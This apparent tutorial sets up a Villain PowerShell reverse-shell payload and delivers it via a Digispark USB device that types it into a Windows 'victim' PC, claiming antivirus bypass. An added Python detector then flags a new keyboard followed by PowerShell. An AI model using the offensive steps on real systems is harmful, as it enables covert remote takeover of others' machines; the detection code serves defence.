• Kali Linux (attacker’s machine)
• Windows 11 (victim’s machine)
• Villain Tool on Kali Linux
• DigiSpark Attiny85
• Arduino IDE
Install the latest version of Villain manually:
sudo git clone https://github.com/t3l3machus/Villain.git
Install the requirements listed in requirements.txt:
cd ./Villain
pip3 install -r requirements.txt
You should also install gnome-terminal (required for one of the framework's commands):
sudo apt update && sudo apt install gnome-terminal
Villain is now ready to use.
With Villain running, we will use it to generate the required payload for our backdoor.
To generate the payload, type the keyword generate, specify the type of payload you want, then specify the local host and press Enter to get the desired payload:
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0
• The payload is generated and it’s time to test it.
• For testing we are using Windows 11.
• Open PowerShell, paste the payload into the shell and press Enter.
• You can see that the payload runs successfully and has bypassed the Windows Antivirus and Firewall.
• To deploy the payload, we will download the Arduino IDE.
• Open the IDE, create a new sketch file and write the code for the Digispark Attiny85.
• The sketch is then compiled and uploaded to the Digispark Attiny85.
• Now the victim plugs the Attiny85 into their machine.
• After a few seconds, the search bar opens and PowerShell is searched for.
• It opens PowerShell, then automatically pastes the payload and presses Enter to execute it.
• Once the script is executed, you can see that a backdoor session has been established on the Villain terminal on the attacker’s machine.
• Now, by typing sessions on the Villain terminal, you can see all the sessions that have been established using the payload.
• It contains Session ID, IP Address, OS Type, User, Owner and Status.
Now that the backdoor has been created, you can easily execute any command.
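From the defender's side, the sequence described above (a new USB keyboard appears, and a few seconds later PowerShell starts) is a pattern that can be detected. The following is an added example, not part of the original write-up or of Villain: it correlates Windows Security events 6416 (new external device recognized) and 4688 (process creation). The record layout, the sample data and the 30-second window are assumptions made for this example.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs), simplified from two Windows
# Security events: 6416 (new external device recognized) and 4688 (process
# creation). The dict layout is an assumption made for this example.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:00", "id": 6416, "ClassName": "Keyboard"},
    {"time": "2024-01-10T09:00:06", "id": 4688, "NewProcessName": PS,
     "SubjectUserName": "alice"},
    # PowerShell with no recent device arrival: ordinary use, not flagged.
    {"time": "2024-01-10T11:30:00", "id": 4688, "NewProcessName": PS,
     "SubjectUserName": "alice"},
    # A storage device is not a keyboard, so this pair is not flagged either.
    {"time": "2024-01-10T14:00:00", "id": 6416, "ClassName": "DiskDrive"},
    {"time": "2024-01-10T14:00:05", "id": 4688, "NewProcessName": PS,
     "SubjectUserName": "bob"},
]

KEYBOARD_CLASSES = {"keyboard", "hidclass"}   # device setup class names
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def find_keyboard_then_powershell(events, window_seconds=30):
    """Return PowerShell launches that follow a new keyboard within the window."""
    window = timedelta(seconds=window_seconds)
    last_keyboard = None          # arrival time of the most recent new keyboard
    hits = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 6416:
            if ev.get("ClassName", "").lower() in KEYBOARD_CLASSES:
                last_keyboard = ts
        elif ev["id"] == 4688 and last_keyboard is not None:
            image = ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
            if image in SHELL_IMAGES and ts - last_keyboard <= window:
                hits.append({"user": ev.get("SubjectUserName"),
                             "process_time": ev["time"],
                             "delay_seconds": (ts - last_keyboard).total_seconds()})
    return hits


if __name__ == "__main__":
    for hit in find_keyboard_then_powershell(SAMPLE_EVENTS):
        print(hit)
```

Both events are only logged when the "Audit PNP Activity" and "Audit Process Creation" audit subcategories are enabled on the host.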